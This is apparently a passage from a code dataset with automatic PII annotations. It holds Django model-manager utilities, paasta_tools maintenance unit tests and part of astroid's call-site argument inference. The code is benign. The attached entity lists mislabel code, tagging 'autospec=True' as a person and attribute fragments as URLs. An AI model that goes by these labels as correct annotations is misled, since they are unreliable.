'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'ovo.cl'], ['URL', 'self.volume.cl'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'used.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'mock.pa'], ['URL', 'cinder.objects.Volume.ge'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'mock.Ma'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'api.delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.re'], ['URL', 'cache.cr'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.as'], ['URL', 'self.co'], ['URL', 'ovo.cl'], ['URL', 'ovo.id'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.volume.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], 
['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'delete.as']] |
73 | from types import ClassType  # Python 2 only; this module predates Python 3 (see also iteritems/keys usage below)
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
"""
FIX see https://bitbucket.PI:KEY
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
"""
def get_attribute(obj, s):
try:
return getattr(obj, s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
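# Illustrative usage sketch (not part of the original module; the model
# names `Place`, `Restaurant`, and `Bar` are assumptions):
#
#     class Place(models.Model):
#         objects = InheritanceManager()
#     class Restaurant(Place): pass
#     class Bar(Place): pass
#
#     for place in Place.objects.select_subclasses():
#         pass  # each `place` is a Restaurant or Bar, not a bare Place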
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
"""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
"""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, "_db"):
kwargs["using"] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
"""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
"""
warnings.warn(
"manager_from is pending deprecation; use PassThroughManager instead.",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
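# Illustrative usage sketch for manager_from (assumed model/method names,
# not from this file). A plain function becomes a method on both the
# generated Manager and its QuerySet, so it chains:
#
#     def published(self):
#         return self.filter(is_published=True)
#
#     class Article(models.Model):
#         is_published = models.BooleanField(default=False)
#         objects = manager_from(published)  # note: returns an instance
#
#     Article.objects.published()
#     Article.objects.all().published()  # same method, chained on a queryset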
| 8,353 | [['PERSON', 'qset = super(InheritanceQuerySet'], ['NRP', 'sub_obj'], ['PERSON', 'order_by'], ['PERSON', 'kargs'], ['PERSON', 'kwds'], ['PERSON', 'George Sakkis'], ['PERSON', 'mixin.__class'], ['LOCATION', 'qs.__class'], ['URL', 'https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses'], ['URL', 'http://djangosnippets.org/snippets/2117/'], ['URL', 'django.contrib.contenttypes.mo'], ['URL', 'django.db.models.fields.re'], ['URL', 'django.db.models.ma'], ['URL', 'django.db.mo'], ['URL', 'rel.va'], ['URL', 'self.mo'], ['URL', 'meta.ge'], ['URL', 'rel.fi'], ['URL', 'rel.field.mo'], ['URL', 'self.mo'], ['URL', 'self.se'], ['URL', 'qs.su'], ['URL', 'a.de'], ['URL', 'kwargs.ke'], ['URL', 'django.VE'], ['URL', 'self.su'], ['URL', 'self.su'], ['URL', 'self.ge'], ['URL', 'models.Ma'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'pks.se'], ['URL', 'ContentType.objects.in'], ['URL', 'pks.ke'], ['URL', 'pks.it'], ['URL', 'type.mo'], ['URL', 'manager.in'], ['URL', 'children.it'], ['URL', 'models.Ma'], ['URL', 'models.Ma'], ['URL', 'self.fi'], ['URL', 'models.Mo'], ['URL', 'PassThroughManager.fo'], ['URL', 'self.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'django.db.mo'], ['URL', 'django.db.models.manager.Ma'], ['URL', 'kwds.ge'], ['URL', 'kwds.it'], ['URL', 'kwds.ge'], ['URL', 'cls.ge'], ['URL', 'cls.ge']] |
74 | # Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from paasta_tools import paasta_maintenance
@mock.patch("paasta_tools.mesos_maintenance.is_host_drained", autospec=True)
@mock.patch(
"paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start", autospec=True
)
def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = []
assert not paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = []
assert paasta_maintenance.is_safe_to_kill("blah")
@mock.patch("paasta_tools.paasta_maintenance.is_hostname_local", autospec=True)
def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):
mock_is_hostname_local.return_value = False
assert paasta_maintenance.is_safe_to_drain("non-localhost") is False
@mock.patch("paasta_tools.paasta_maintenance.getfqdn", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.gethostname", autospec=True)
def test_is_hostname_local_works(mock_gethostname, mock_getfqdn):
mock_gethostname.return_value = "foo"
mock_getfqdn.return_value = "foo.bar"
assert paasta_maintenance.is_hostname_local("localhost") is True
assert paasta_maintenance.is_hostname_local("foo") is True
assert paasta_maintenance.is_hostname_local("foo.bar") is True
assert paasta_maintenance.is_hostname_local("something_different") is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
def test_are_local_tasks_in_danger_fails_safe_with_false(
mock_load_system_paasta_config,
):
"""If something unexpected happens that we don't know how to
interpret, we make sure that we fail with "False" so that processes
move on and don't deadlock. In general the answer to "is it safe to drain"
is "yes" if mesos can't be reached, etc"""
mock_load_system_paasta_config.side_effect = Exception
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
def test_are_local_tasks_in_danger_is_false_with_nothing_running(
mock_marathon_services_running_here, mock_load_system_paasta_config
):
mock_marathon_services_running_here.return_value = []
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = False
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is False
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.synapse_replication_is_low", autospec=True)
def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(
mock_synapse_replication_is_low,
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = True
mock_synapse_replication_is_low.return_value = True
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is True
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
assert mock_synapse_replication_is_low.call_count == 1
@mock.patch(
"paasta_tools.paasta_maintenance.load_marathon_service_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.load_smartstack_info_for_service", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace",
autospec=True,
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_replication_for_services", autospec=True
)
def test_synapse_replication_is_low_understands_underreplicated_services(
mock_get_replication_for_services,
mock_get_expected_instance_count_for_namespace,
mock_load_smartstack_info_for_service,
mock_load_marathon_service_config,
):
mock_load_marathon_service_config.return_value.get_registrations.return_value = (
"service.main"
)
mock_get_expected_instance_count_for_namespace.return_value = 3
mock_load_smartstack_info_for_service.return_value = {
"local_region": {"service.main": "up"}
}
mock_get_replication_for_services.return_value = {"service.main": 1}
local_backends = ["foo"]
system_paasta_config = mock.MagicMock()
assert (
paasta_maintenance.synapse_replication_is_low(
service="service",
instance="instance",
system_paasta_config=system_paasta_config,
local_backends=local_backends,
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "127.0.0.1"
local_port = 42
backends = [
{"status": "UP", "pxname": "service.main", "svname": "127.0.0.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "127.0.0.1"
local_port = 42
backends = [
{"status": "DOWN", "pxname": "service.main", "svname": "127.0.0.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):
mock_gethostbyname.return_value = "127.0.0.1"
local_port = 42
backends = [
{
"status": "DOWN",
"pxname": "service.main",
"svname": "127.0.0.1:666_otherhostname",
}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
| 8,242 | [['DATE_TIME', '2015-2016'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'paasta_maintenance.is_safe_to_drain("non'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['NRP', 'mock_synapse_replication_is_low.call_count =='], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.ge'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'local.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostname.re'], ['URL', 'getfqdn.re'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'config.si'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'haproxy.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.sy'], ['URL', 'haproxy.re'], ['URL', 'low.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'low.ca'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'config.re'], ['URL', 'value.ge'], ['URL', 'registrations.re'], ['URL', 'service.ma'], ['URL', 'namespace.re'], ['URL', 'service.re'], ['URL', 'service.ma'], ['URL', 
'services.re'], ['URL', 'service.ma'], ['URL', 'mock.Ma'], ['URL', 'maintenance.sy'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is']] |
75 | # Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com
# Copyright (c) 2015-2016 Ceridwen dummy@email.com
# Copyright (c) 2018 Bryce Guinta dummy@email.com
# Copyright (c) 2018 Nick Drozd dummy@email.com
# Copyright (c) 2018 Anthony Sottile dummy@email.com
# Copyright (c) 2020 hippo91 dummy@email.com
# Copyright (c) 2021 Pierre Sassoulas dummy@email.com
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions, nodes, util
class CallSite:
"""Class for understanding arguments passed into a call site
It needs a call context, which contains the arguments and the
keyword arguments that were passed into a given call site.
In order to infer what an argument represents, call :meth:`infer_argument`
with the corresponding function node and the argument name.
:param callcontext:
An instance of :class:`astroid.context.CallContext`, that holds
the arguments for the call site.
:param argument_context_map:
Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`
:param context:
An instance of :class:`astroid.context.Context`.
"""
def __init__(self, callcontext, argument_context_map=None, context=None):
if argument_context_map is None:
argument_context_map = {}
self.argument_context_map = argument_context_map
args = callcontext.args
keywords = callcontext.keywords
self.duplicated_keywords = set()
self._unpacked_args = self._unpack_args(args, context=context)
self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)
self.positional_arguments = [
arg for arg in self._unpacked_args if arg is not util.Uninferable
]
self.keyword_arguments = {
key: value
for key, value in self._unpacked_kwargs.items()
if value is not util.Uninferable
}
@classmethod
def from_call(cls, call_node, context=None):
"""Get a CallSite object from the given Call node.
:param context:
An instance of :class:`astroid.context.Context` that will be used
to force a single inference path.
"""
# Determine the callcontext from the given `context` object if any.
context = context or contextmod.InferenceContext()
callcontext = contextmod.CallContext(call_node.args, call_node.keywords)
return cls(callcontext, context=context)
def has_invalid_arguments(self):
"""Check if in the current CallSite were passed *invalid* arguments
This can mean multiple things. For instance, if an unpacking
of an invalid object was passed, then this method will return True.
Other cases can be when the arguments can't be inferred by astroid,
for example, by passing objects which aren't known statically.
"""
return len(self.positional_arguments) != len(self._unpacked_args)
def has_invalid_keywords(self):
"""Check if in the current CallSite were passed *invalid* keyword arguments
For instance, unpacking a dictionary with integer keys is invalid
(**{1:2}), because the keys must be strings, which will make this
method to return True. Other cases where this might return True if
objects which can't be inferred were passed.
"""
return len(self.keyword_arguments) != len(self._unpacked_kwargs)
def _unpack_keywords(self, keywords, context=None):
values = {}
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for name, value in keywords:
if name is None:
# Then it's an unpacking operation (**)
try:
inferred = next(value.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(inferred, nodes.Dict):
# Not something we can work with.
values[name] = util.Uninferable
continue
for dict_key, dict_value in inferred.items:
try:
dict_key = next(dict_key.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(dict_key, nodes.Const):
values[name] = util.Uninferable
continue
if not isinstance(dict_key.value, str):
values[name] = util.Uninferable
continue
if dict_key.value in values:
# The name is already in the dictionary
values[dict_key.value] = util.Uninferable
self.duplicated_keywords.add(dict_key.value)
continue
values[dict_key.value] = dict_value
else:
values[name] = value
return values
def _unpack_args(self, args, context=None):
values = []
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for arg in args:
if isinstance(arg, nodes.Starred):
try:
inferred = next(arg.value.infer(context=context))
except exceptions.InferenceError:
values.append(util.Uninferable)
continue
if inferred is util.Uninferable:
values.append(util.Uninferable)
continue
if not hasattr(inferred, "elts"):
values.append(util.Uninferable)
continue
values.extend(inferred.elts)
else:
values.append(arg)
return values
def infer_argument(self, funcnode, name, context):
"""infer a function argument value according to the call context
Arguments:
funcnode: The function being called.
name: The name of the argument whose value is being inferred.
context: Inference context object
"""
if name in self.duplicated_keywords:
raise exceptions.InferenceError(
"The arguments passed to {func!r} " " have duplicate keywords.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
# Look into the keywords first, maybe it's already there.
try:
return self.keyword_arguments[name].infer(context)
except KeyError:
pass
# Too many arguments given and no variable arguments.
if len(self.positional_arguments) > len(funcnode.args.args):
if not funcnode.args.vararg and not funcnode.args.posonlyargs:
raise exceptions.InferenceError(
"Too many positional arguments "
"passed to {func!r} that does "
"not have *args.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
positional = self.positional_arguments[: len(funcnode.args.args)]
vararg = self.positional_arguments[len(funcnode.args.args) :]
argindex = funcnode.args.find_argname(name)[0]
kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}
kwargs = {
key: value
for key, value in self.keyword_arguments.items()
if key not in kwonlyargs
}
# If there are too few positionals compared to
# what the function expects to receive, check to see
# if the missing positional arguments were passed
# as keyword arguments and if so, place them into the
# positional args list.
if len(positional) < len(funcnode.args.args):
for func_arg in funcnode.args.args:
if func_arg.name in kwargs:
arg = kwargs.pop(func_arg.name)
positional.append(arg)
if argindex is not None:
# 2. first argument of instance/class method
if argindex == 0 and funcnode.type in ("method", "classmethod"):
if context.boundnode is not None:
boundnode = context.boundnode
else:
# XXX can do better ?
boundnode = funcnode.parent.frame()
if isinstance(boundnode, nodes.ClassDef):
# Verify that we're accessing a method
# of the metaclass through a class, as in
# `cls.metaclass_method`. In this case, the
# first argument is always the class.
method_scope = funcnode.parent.scope()
if method_scope is boundnode.metaclass():
return iter((boundnode,))
if funcnode.type == "method":
if not isinstance(boundnode, bases.Instance):
boundnode = boundnode.instantiate_class()
return iter((boundnode,))
if funcnode.type == "classmethod":
return iter((boundnode,))
# if we have a method, extract one position
# from the index, so we'll take in account
# the extra parameter represented by `self` or `cls`
if funcnode.type in ("method", "classmethod"):
argindex -= 1
# 2. search arg index
try:
return self.positional_arguments[argindex].infer(context)
except IndexError:
pass
if funcnode.args.kwarg == name:
# It wants all the keywords that were passed into
# the call site.
if self.has_invalid_keywords():
raise exceptions.InferenceError(
"Inference failed to find values for all keyword arguments "
"to {func!r}: {unpacked_kwargs!r} doesn't correspond to "
"{keyword_arguments!r}.",
keyword_arguments=self.keyword_arguments,
unpacked_kwargs=self._unpacked_kwargs,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
kwarg = nodes.Dict(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
kwarg.postinit(
[(nodes.const_factory(key), value) for key, value in kwargs.items()]
)
return iter((kwarg,))
if funcnode.args.vararg == name:
# It wants all the args that were passed into
# the call site.
if self.has_invalid_arguments():
raise exceptions.InferenceError(
"Inference failed to find values for all positional "
"arguments to {func!r}: {unpacked_args!r} doesn't "
"correspond to {positional_arguments!r}.",
positional_arguments=self.positional_arguments,
unpacked_args=self._unpacked_args,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
args = nodes.Tuple(
